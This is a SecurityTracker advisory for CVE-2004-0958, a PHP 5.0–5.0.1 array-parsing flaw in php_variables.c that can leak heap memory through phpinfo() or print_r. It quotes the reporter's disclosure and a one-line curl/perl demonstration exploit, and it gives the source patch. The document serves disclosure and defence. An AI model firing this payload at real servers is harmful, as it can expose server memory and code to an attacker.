Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP Array Parsing Error in php_variables May Disclose Memory Contents via phpinfo()
SecurityTracker Alert ID:  1011279
SecurityTracker URL:
CVE Reference:   CVE-2004-0958   (Links to External Site)
Updated:  Oct 19 2004
Original Entry Date:  Sep 15 2004
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0 - 5.0.1
Description:   A vulnerability was reported in PHP in the phpinfo() function. A remote user may be able to obtain memory contents.

Stefano Di Paola reported that an array parsing error in 'php_variables.c' may cause the system to display arbitrary memory contents. A remote user can append a GET, POST, or COOKIE variable array to a request to trigger the flaw.

A demonstration exploit is shown [where 'phpinfo.php' contains the phpinfo() function]:

$ curl "" -d `perl -e 'print "f"x100;print "[g][=1"'`

Alternately, the file may contain a print_r($_REQUEST) function call.

Impact:   A remote user may be able to obtain random memory contents.
Solution:   A fix is available via CVS:

Vendor URL: (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  PHP Vulnerability N. 1

Hi all,
This summer i have been playing around with some php issue
and got some php vulnerabilities..

Let's go for the first one:

Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type:  Exposure of sensitive informations
Vendor Status: Fix released on


Bad array parsing in php_variables.c could lead to show arbitrary memory
content such as pieces of php code and other data.
This affects all GET, POST or COOKIES variables.


By appending to a GET/POST/COOKIE variable array a [ (open square
bracket) like abc[a][, 
the length of the 'a' array element is set to the length of variable
name strlen("abc").

$ curl  "" -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:

or some php file containing print_r function:

it will print the output similar to:
      ffffffffffffffffffffffffffffffffffffffff] => Array
\0\0\0\0] => 1

As probably you might have noticed all the garbage shown is memory
content that could be everything (on the heap i suppose). 

I have tried some request and it expose some piece of php code sometime.

Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace around line 136 for php 5.0.1 in main/php_variables.c

index_len = var_len = strlen(var);


index_len = var_len = strlen(index);
and compile again.

But if you're lazy the patch can be found on the CVS


Stefano Di Paola

Stefano Di Paola
Software Engineer


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC